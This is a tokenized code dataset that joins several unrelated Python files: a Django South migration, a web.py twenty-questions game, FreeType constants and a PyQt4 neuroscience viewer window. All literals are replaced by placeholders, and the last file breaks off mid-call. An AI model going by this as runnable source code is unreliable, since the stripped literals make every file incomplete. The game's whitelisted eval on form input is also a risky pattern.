'<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' 
: '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:3>' , '<STR_LIT:blank>' : '<STR_LIT:3>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:status>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:1>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : 
'<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:value>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> 
'<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> } <EOL> } <EOL> if HAS_TAG_SUPPORT : <EOL> models [ '<STR_LIT>' ] . update ( { '<STR_LIT>' : ( '<STR_LIT>' , [ ] , <EOL> { } ) , } ) <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> import sys <EOL> import time <EOL> from django . conf import settings <EOL> from django . db . utils import load_backend <EOL> from django . db . backends import creation <EOL> TEST_DATABASE_PREFIX = '<STR_LIT>' <EOL> class BaseDatabaseCreation ( creation . BaseDatabaseCreation ) : pass </s>
<s> __author__ = '<STR_LIT>' </s>
<s> '''<STR_LIT>''' <EOL> import web <EOL> import config , model <EOL> import twentyquestions as game <EOL> import admin <EOL> urls = ( <EOL> '<STR_LIT:/>' , '<STR_LIT:index>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , admin . app <EOL> ) <EOL> app = web . application ( urls , globals ( ) ) <EOL> render = web . template . render ( '<STR_LIT>' , base = '<STR_LIT>' ) <EOL> session_vars = { '<STR_LIT:count>' : <NUM_LIT:1> , '<STR_LIT>' : { } , '<STR_LIT>' : [ ] , '<STR_LIT>' : { } } <EOL> session = web . session . Session ( app , web . session . DiskStore ( '<STR_LIT>' ) , initializer = session_vars ) <EOL> def reset_game ( ) : <EOL> '''<STR_LIT>''' <EOL> session . kill ( ) <EOL> class index : <EOL> def GET ( self ) : <EOL> '''<STR_LIT>''' <EOL> if config . DISPLAY_CANDIDATES : <EOL> nearby_objects_values = game . get_nearby_objects_values ( session . objects_values , how_many = <NUM_LIT:10> ) <EOL> else : <EOL> nearby_objects_values = None <EOL> if not ( session . get ( '<STR_LIT>' ) ) and not ( session . get ( '<STR_LIT>' ) ) : <EOL> question = '<STR_LIT>' <EOL> else : <EOL> question = game . choose_question ( session . initial_questions , session . objects_values , session . asked_questions ) <EOL> if question == None or session . count > <NUM_LIT:20> : <EOL> raise web . seeother ( '<STR_LIT>' ) <EOL> return render . index ( question , session . get ( '<STR_LIT:count>' ) , nearby_objects_values ) <EOL> class begin : <EOL> def POST ( self ) : <EOL> '''<STR_LIT>''' <EOL> session . initial_questions = game . load_initial_questions ( ) <EOL> session . objects_values = game . load_objects_values ( ) <EOL> raise web . seeother ( '<STR_LIT:/>' ) <EOL> class restart : <EOL> def POST ( self ) : <EOL> '''<STR_LIT>''' <EOL> reset_game ( ) <EOL> raise web . 
seeother ( '<STR_LIT:/>' ) <EOL> class answer : <EOL> def POST ( self , question_id ) : <EOL> '''<STR_LIT>''' <EOL> question_id = int ( question_id ) <EOL> a = web . input ( ) . answer <EOL> if a in [ '<STR_LIT:yes>' , '<STR_LIT>' , '<STR_LIT>' ] : answer = eval ( '<STR_LIT>' + a ) <EOL> else : answer = game . unsure <EOL> if answer != game . unsure : <EOL> session . count += <NUM_LIT:1> <EOL> game . update_local_knowledgebase ( session . objects_values , session . asked_questions , question_id , answer ) <EOL> raise web . seeother ( '<STR_LIT:/>' ) <EOL> class guess : <EOL> def GET ( self , chosen_id = None ) : <EOL> '''<STR_LIT>''' <EOL> chosen = game . guess ( session . objects_values ) <EOL> return render . guess ( chosen ) <EOL> def POST ( self , chosen_id = None ) : <EOL> '''<STR_LIT>''' <EOL> a = web . input ( ) . answer <EOL> if not ( chosen_id ) : <EOL> chosen_id = <NUM_LIT:1> <EOL> if a in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> raise web . seeother ( '<STR_LIT>' ) <EOL> elif a in [ '<STR_LIT:yes>' ] : <EOL> game . learn ( session . asked_questions , int ( chosen_id ) ) <EOL> reset_game ( ) <EOL> raise web . seeother ( '<STR_LIT:/>' ) <EOL> class learn : <EOL> def GET ( self ) : <EOL> '''<STR_LIT>''' <EOL> nearby_objects = game . get_nearby_objects ( session . objects_values , how_many = <NUM_LIT:20> ) <EOL> return render . learn ( nearby_objects ) <EOL> def POST ( self ) : <EOL> '''<STR_LIT>''' <EOL> inputs = web . input ( ) <EOL> name = inputs . get ( '<STR_LIT:name>' ) <EOL> if name == "<STR_LIT>" : <EOL> name = inputs . get ( '<STR_LIT>' ) <EOL> question = inputs . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if question : <EOL> new_question_answer = inputs . get ( '<STR_LIT>' ) <EOL> if new_question_answer in [ '<STR_LIT:yes>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> answer = eval ( '<STR_LIT>' + new_question_answer ) * game . NEW_QUESTION_SCALE <EOL> else : answer = game . unsure <EOL> if question . strip ( ) != '<STR_LIT>' and not ( model . 
get_question_by_text ( question . strip ( ) ) ) : <EOL> new_question_id = model . add_question ( question ) <EOL> else : <EOL> new_question = model . get_question_by_text ( question . strip ( ) ) <EOL> if new_question : <EOL> new_question_id = new_question . id <EOL> else : <EOL> new_question_id = None <EOL> if name : <EOL> new_object_id = game . learn_character ( session . asked_questions , name ) <EOL> else : <EOL> new_object_id = None <EOL> if new_question_id and new_object_id : <EOL> model . update_data ( new_object_id , new_question_id , answer ) <EOL> reset_game ( ) <EOL> raise web . seeother ( '<STR_LIT:/>' ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> '''<STR_LIT>''' <EOL> if web . config . debug : <EOL> app . internalerror = web . debugerror <EOL> app . run ( ) </s>
<s> """<STR_LIT>""" <EOL> FT_FSTYPES = { '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , } <EOL> globals ( ) . update ( FT_FSTYPES ) <EOL> ft_fstype_installable_embedding = FT_FSTYPE_INSTALLABLE_EMBEDDING <EOL> ft_fstype_restricted_license_embedding = FT_FSTYPE_RESTRICTED_LICENSE_EMBEDDING <EOL> ft_fstype_preview_and_print_embedding = FT_FSTYPE_PREVIEW_AND_PRINT_EMBEDDING <EOL> ft_fstype_editable_embedding = FT_FSTYPE_EDITABLE_EMBEDDING <EOL> ft_fstype_no_subsetting = FT_FSTYPE_NO_SUBSETTING <EOL> ft_fstype_bitmap_embedding_only = FT_FSTYPE_BITMAP_EMBEDDING_ONLY </s>
<s> __version__ = '<STR_LIT>' <EOL> import matplotlib <EOL> matplotlib . use ( '<STR_LIT>' ) </s>
<s> import os <EOL> from collections import OrderedDict <EOL> import logging <EOL> import pickle <EOL> import copy <EOL> import json <EOL> import neo <EOL> from PyQt4 . QtCore import ( Qt , pyqtSignature , QThread ) <EOL> from PyQt4 . QtGui import ( QMessageBox , QApplication , <EOL> QProgressDialog , QFileDialog ) <EOL> try : <EOL> from spyderlib . widgets . dicteditor import DictEditor <EOL> except ImportError : <EOL> from spyderlib . widgets . variableexplorer . collectionseditor import CollectionsEditor as DictEditor <EOL> from spykeutils import SpykeException <EOL> from spykeutils . progress_indicator import ignores_cancel <EOL> from spykeutils . plugin . data_provider_neo import NeoDataProvider <EOL> from spykeutils . plugin . data_provider_stored import NeoStoredProvider <EOL> from spykeutils . plugin import io_plugin <EOL> from . main_window import MainWindow <EOL> from . . plugin_framework . data_provider_viewer import NeoViewerProvider <EOL> from . neo_navigation import NeoNavigationDock <EOL> from . dir_files_dialog import DirFilesDialog <EOL> from . import io_settings <EOL> from . . import api <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> class MainWindowNeo ( MainWindow ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , parent = None , splash = None ) : <EOL> super ( MainWindowNeo , self ) . __init__ ( parent , splash ) <EOL> self . block_ids = { } <EOL> self . block_names = OrderedDict ( ) <EOL> self . block_files = { } <EOL> self . block_index = <NUM_LIT:0> <EOL> self . was_empty = True <EOL> self . channel_group_names = { } <EOL> self . io_write_params = { } <EOL> nav = NeoNavigationDock ( self ) <EOL> self . neoNavigationDock = nav <EOL> self . neoNavigationDock . setObjectName ( '<STR_LIT>' ) <EOL> self . addDockWidget ( Qt . LeftDockWidgetArea , self . neoNavigationDock ) <EOL> self . neoNavigationDock . setVisible ( True ) <EOL> self . neoNavigationDock . object_removed . connect ( self . refresh_neo_view ) <EOL> self . 
filter_populate_function = { '<STR_LIT>' : nav . populate_neo_block_list , <EOL> '<STR_LIT>' : nav . populate_neo_channel_list , <EOL> '<STR_LIT>' : nav . populate_neo_channel_group_list , <EOL> '<STR_LIT>' : nav . populate_neo_segment_list , <EOL> '<STR_LIT>' : nav . populate_neo_unit_list } <EOL> self . activate_neo_mode ( ) <EOL> self . finish_initialization ( ) <EOL> def get_filter_types ( self ) : <EOL> """<STR_LIT>""" <EOL> l = super ( MainWindowNeo , self ) . get_filter_types ( ) <EOL> l . extend ( [ ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> return l <EOL> def get_console_objects ( self ) : <EOL> """<STR_LIT>""" <EOL> d = super ( MainWindowNeo , self ) . get_console_objects ( ) <EOL> import quantities <EOL> import neo <EOL> import spykeutils <EOL> d [ '<STR_LIT>' ] = quantities <EOL> d [ '<STR_LIT>' ] = neo <EOL> d [ '<STR_LIT>' ] = spykeutils <EOL> return d <EOL> def set_initial_layout ( self ) : <EOL> self . neoNavigationDock . setVisible ( True ) <EOL> super ( MainWindowNeo , self ) . set_initial_layout ( ) <EOL> def set_current_selection ( self , data ) : <EOL> if data [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> self . set_neo_selection ( data ) <EOL> else : <EOL> raise NotImplementedError ( <EOL> '<STR_LIT>' ) <EOL> def add_selection ( self , data ) : <EOL> if data [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> self . add_neo_selection ( data ) <EOL> else : <EOL> raise NotImplementedError ( <EOL> '<STR_LIT>' ) <EOL> def activate_neo_mode ( self ) : <EOL> self . provider = NeoViewerProvider ( self ) <EOL> self . provider_factory = NeoStoredProvider . from_current_selection <EOL> self . console . interpreter . locals [ '<STR_LIT>' ] = self . provider <EOL> if self . ipy_kernel : <EOL> self . ipy_kernel . push ( { '<STR_LIT>' : self . 
provider } ) <EOL> def reload_plugins ( self , keep_configs = True ) : <EOL> super ( MainWindowNeo , self ) . reload_plugins ( keep_configs ) <EOL> self . reload_neo_io_plugins ( ) <EOL> def reload_neo_io_plugins ( self ) : <EOL> neo . io . iolist = [ io for io in neo . io . iolist <EOL> if not hasattr ( io , '<STR_LIT>' ) ] <EOL> for pp in self . plugin_paths : <EOL> for f in os . listdir ( pp ) : <EOL> p = os . path . join ( pp , f ) <EOL> if os . path . isdir ( p ) : <EOL> continue <EOL> if not p . lower ( ) . endswith ( '<STR_LIT>' ) : <EOL> continue <EOL> try : <EOL> io_plugin . load_from_file ( p ) <EOL> except SpykeException , e : <EOL> logger . warning ( str ( e ) ) <EOL> self . neoIOComboBox . clear ( ) <EOL> iolabels = [ ] <EOL> for io in neo . io . iolist : <EOL> if io . name : <EOL> iolabels . append ( ( io . name , io ) ) <EOL> else : <EOL> iolabels . append ( ( io . __name__ , io ) ) <EOL> iolabels . sort ( key = lambda x : x [ <NUM_LIT:0> ] . lower ( ) ) <EOL> self . neoIOComboBox . addItem ( '<STR_LIT>' ) <EOL> self . neoIOComboBox . setItemData ( <NUM_LIT:0> , None ) <EOL> self . neoIOComboBox . addItems ( [ l [ <NUM_LIT:0> ] for l in iolabels ] ) <EOL> for i , l in enumerate ( iolabels ) : <EOL> self . neoIOComboBox . setItemData ( i + <NUM_LIT:1> , l [ <NUM_LIT:1> ] ) <EOL> for p in self . io_write_params . keys ( ) : <EOL> if p not in neo . io . iolist : <EOL> del self . io_write_params [ p ] <EOL> for p in NeoDataProvider . io_params . keys ( ) : <EOL> if p not in neo . io . iolist : <EOL> del NeoDataProvider . io_params [ p ] <EOL> def get_letter_id ( self , id_ , small = False ) : <EOL> """<STR_LIT>""" <EOL> return self . neoNavigationDock . get_letter_id ( id_ , small ) <EOL> class LoadWorker ( QThread ) : <EOL> def __init__ ( self , paths ) : <EOL> QThread . __init__ ( self ) <EOL> self . paths = paths <EOL> self . blocks = [ ] <EOL> self . error = None <EOL> def run ( self ) : <EOL> try : <EOL> self . blocks = NeoDataProvider . 
get_blocks ( self . paths [ <NUM_LIT:0> ] ) <EOL> except Exception as e : <EOL> self . error = e <EOL> raise <EOL> def load_files ( self , file_paths ) : <EOL> self . progress . begin ( '<STR_LIT>' ) <EOL> self . progress . set_ticks ( len ( file_paths ) ) <EOL> self . load_worker = self . LoadWorker ( file_paths ) <EOL> self . load_progress = QProgressDialog ( self . progress ) <EOL> self . load_progress . setWindowTitle ( '<STR_LIT>' ) <EOL> self . load_progress . setLabelText ( file_paths [ <NUM_LIT:0> ] ) <EOL> self . load_progress . setMaximum ( <NUM_LIT:0> ) <EOL> self . load_progress . setCancelButton ( None ) <EOL> self . load_worker . finished . connect ( self . load_file_callback ) <EOL> self . load_worker . terminated . connect ( self . load_file_callback ) <EOL> self . load_progress . show ( ) <EOL> self . load_worker . start ( ) <EOL> def edit_annotations ( self , data ) : <EOL> """<STR_LIT>""" <EOL> editor = DictEditor ( self ) <EOL> title = '<STR_LIT>' <EOL> if data . name : <EOL> title += '<STR_LIT>' % data . name <EOL> editor . setup ( data . annotations , title ) <EOL> editor . accepted . connect ( <EOL> lambda : self . _editor_ok ( data , editor ) ) <EOL> editor . show ( ) <EOL> editor . raise_ ( ) <EOL> editor . activateWindow ( ) <EOL> def _editor_ok ( self , data , editor ) : <EOL> data . annotations = editor . get_value ( ) <EOL> @ ignores_cancel <EOL> def load_file_callback ( self ) : <EOL> if not self . load_worker : <EOL> self . progress . done ( ) <EOL> return <EOL> blocks = self . load_worker . blocks <EOL> if blocks is None : <EOL> QMessageBox . critical ( <EOL> self , '<STR_LIT>' , <EOL> '<STR_LIT>' % <EOL> self . load_worker . paths [ <NUM_LIT:0> ] ) <EOL> logger . error ( '<STR_LIT>' % <EOL> self . load_worker . paths [ <NUM_LIT:0> ] ) <EOL> self . progress . done ( ) <EOL> self . load_progress . reset ( ) <EOL> self . raise_ ( ) <EOL> return <EOL> if self . load_worker . error : <EOL> QMessageBox . 
critical ( <EOL> self , '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( <EOL> self . load_worker . paths [ <NUM_LIT:0> ] , <EOL> type ( self . load_worker . error ) . __name__ , <EOL> str ( self . load_worker . error ) ) ) <EOL> self . progress . done ( ) <EOL> self . load_progress . reset ( ) <EOL> self . raise_ ( ) <EOL> return <EOL> for block in blocks : <EOL> name = block . name <EOL> if not name or name == '<STR_LIT>' : <EOL> name = os . path . splitext ( os . path . basename ( <EOL> self . load_worker . paths [ <NUM_LIT:0> ] ) ) [ <NUM_LIT:0> ] <EOL> name += '<STR_LIT>' % self . get_letter_id ( self . block_index ) <EOL> self . block_names [ block ] = name <EOL> self . block_ids [ block ] = self . get_letter_id ( self . block_index ) <EOL> self . block_files [ block ] = self . load_worker . paths [ <NUM_LIT:0> ] <EOL> self . block_index += <NUM_LIT:1> <EOL> self . load_progress . reset ( ) <EOL> self . progress . step ( ) <EOL> paths = self . load_worker . paths [ <NUM_LIT:1> : ] <EOL> if not paths : <EOL> self . progress . done ( ) <EOL> if not self . was_empty : <EOL> self . refresh_neo_view ( ) <EOL> else : <EOL> self . neoNavigationDock . populate_neo_block_list ( ) <EOL> self . was_empty = False <EOL> self . load_worker = None <EOL> return <EOL> self . load_worker = self . LoadWorker ( paths ) <EOL> self . load_progress . setLabelText ( paths [ <NUM_LIT:0> ] ) <EOL> self . load_progress . show ( ) <EOL> self . load_worker . finished . connect ( self . load_file_callback ) <EOL> self . load_worker . terminated . connect ( self . load_file_callback ) <EOL> self . load_worker . start ( ) <EOL> @ ignores_cancel <EOL> def on_loadFilesButton_pressed ( self ) : <EOL> if not self . block_index : <EOL> self . was_empty = True <EOL> indices = self . fileTreeView . selectedIndexes ( ) <EOL> fs_model = self . file_system_model <EOL> self . load_files ( [ fs_model . 
filePath ( idx ) for idx in indices ] ) <EOL> def on_fileTreeView_doubleClicked ( self , index ) : <EOL> if not self . fileTreeView . model ( ) . isDir ( index ) : <EOL> self . on_loadFilesButton_pressed ( ) <EOL> def refresh_neo_view ( self ) : <EOL> self . set_current_selection ( self . provider . data_dict ( ) ) <EOL> def neo_blocks ( self ) : <EOL> return self . neoNavigationDock . blocks ( ) <EOL> def all_neo_blocks ( self ) : <EOL> return self . block_names . keys ( ) <EOL> def neo_block_file_names ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . block_files <EOL> def neo_segments ( self ) : <EOL> return self . neoNavigationDock . segments ( ) <EOL> def neo_channel_groups ( self ) : <EOL> return self . neoNavigationDock . recording_channel_groups ( ) <EOL> def neo_units ( self ) : <EOL> return self . neoNavigationDock . units ( ) <EOL> def neo_channels ( self ) : <EOL> return self . neoNavigationDock . recording_channels ( ) <EOL> @ pyqtSignature ( "<STR_LIT>" ) <EOL> def on_actionClearCache_triggered ( self ) : <EOL> if QMessageBox . question ( <EOL> self , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> QMessageBox . Yes | QMessageBox . No ) == QMessageBox . No : <EOL> return <EOL> NeoDataProvider . clear ( ) <EOL> self . neoNavigationDock . clear ( ) <EOL> self . block_ids . clear ( ) <EOL> self . block_files . clear ( ) <EOL> self . block_names . clear ( ) <EOL> self . block_index = <NUM_LIT:0> <EOL> self . neoNavigationDock . populate_neo_block_list ( ) <EOL> def add_neo_selection ( self , data ) : <EOL> """<STR_LIT>""" <EOL> self . selections . append ( NeoStoredProvider ( data , self . progress ) ) <EOL> def set_neo_selection ( self , data ) : <EOL> """<STR_LIT>""" <EOL> self . progress . begin ( '<STR_LIT>' ) <EOL> self . progress . set_ticks ( len ( data [ '<STR_LIT>' ] ) ) <EOL> for b in data [ '<STR_LIT>' ] : <EOL> if unicode ( b [ <NUM_LIT:1> ] ) in self . block_files . values ( ) : <EOL> self . progress . step ( ) <EOL> continue <EOL> QApplication . 
setOverrideCursor ( Qt . WaitCursor ) <EOL> try : <EOL> cl = None <EOL> rp = None <EOL> if len ( b ) > <NUM_LIT:2> : <EOL> cl = NeoDataProvider . find_io_class ( b [ <NUM_LIT:2> ] ) <EOL> if len ( b ) > <NUM_LIT:3> : <EOL> rp = b [ <NUM_LIT:3> ] <EOL> blocks = NeoDataProvider . get_blocks ( <EOL> b [ <NUM_LIT:1> ] , force_io = cl , read_params = rp ) <EOL> finally : <EOL> QApplication . restoreOverrideCursor ( ) <EOL> if not blocks : <EOL> logger . error ( '<STR_LIT>' % b [ <NUM_LIT:1> ] ) <EOL> self . progress . step ( ) <EOL> continue <EOL> for block in blocks : <EOL> name = block . name <EOL> if not name or name == '<STR_LIT>' : <EOL> name = os . path . basename ( b [ <NUM_LIT:1> ] ) <EOL> name += '<STR_LIT>' % self . get_letter_id ( self . block_index ) <EOL> self . block_names [ block ] = name <EOL> self . block_ids [ block ] = self . get_letter_id ( self . block_index ) <EOL> self . block_files [ block ] = b [ <NUM_LIT:1> ] <EOL> self . block_index += <NUM_LIT:1> <EOL> self . progress . step ( ) <EOL> self . progress . done ( ) <EOL> self . neoNavigationDock . set_selection ( data ) <EOL> class SaveWorker ( QThread ) : <EOL> def __init__ ( self , file_name , blocks , io , params ) : <EOL> QThread . __init__ ( self ) <EOL> self . file_name = file_name <EOL> self . blocks = blocks <EOL> self . io = io ( filename = file_name ) <EOL> self . params = params <EOL> self . terminated . connect ( self . cleanup ) <EOL> self . finished . connect ( self . cleanup ) <EOL> def run ( self ) : <EOL> if hasattr ( self . io , '<STR_LIT>' ) : <EOL> self . io . write ( self . blocks , ** self . params ) <EOL> else : <EOL> if neo . Block not in self . io . writeable_objects : <EOL> logger . warning ( '<STR_LIT>' % <EOL> ( self . io . name or type ( self . io ) . __name__ ) ) <EOL> if not len ( self . blocks [ <NUM_LIT:0> ] . segments ) == <NUM_LIT:1> : <EOL> logger . warning ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> else : <EOL> logger . warning ( <EOL> '<STR_LIT>' ) <EOL> self . 
io . write ( self . blocks [ <NUM_LIT:0> ] , ** self . params ) <EOL> else : <EOL> if len ( self . blocks ) > <NUM_LIT:1> : <EOL> logger . warning ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . io . write ( self . blocks [ <NUM_LIT:0> ] , ** self . params ) <EOL> def cleanup ( self ) : <EOL> if self . io : <EOL> if hasattr ( self . io , '<STR_LIT>' ) : <EOL> self . io . close ( ) <EOL> self . io = None <EOL> def _save_blocks ( self , blocks , file_name , io ) : <EOL> if not blocks : <EOL> QMessageBox . warning ( self , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> self . progress . done ( ) <EOL> return <EOL> self . progress . set_ticks ( <NUM_LIT:0> ) <EOL> self . progress . setWindowTitle ( '<STR_LIT>' ) <EOL> self . progress . set_status ( '<STR_LIT>' ) <EOL> if not os . path . splitext ( file_name ) [ <NUM_LIT:1> ] : <EOL> if len ( io . extensions ) == <NUM_LIT:1> : <EOL> file_name += '<STR_LIT:.>' + io . extensions [ <NUM_LIT:0> ] <EOL> self . worker = self . SaveWorker ( file_name , blocks , io , <EOL> self . io_write_params . get ( io , { } ) ) <EOL> self . worker . finished . connect ( self . progress . done ) <EOL> self . progress . canceled . connect ( self . worker . terminate ) <EOL> self . worker . start ( 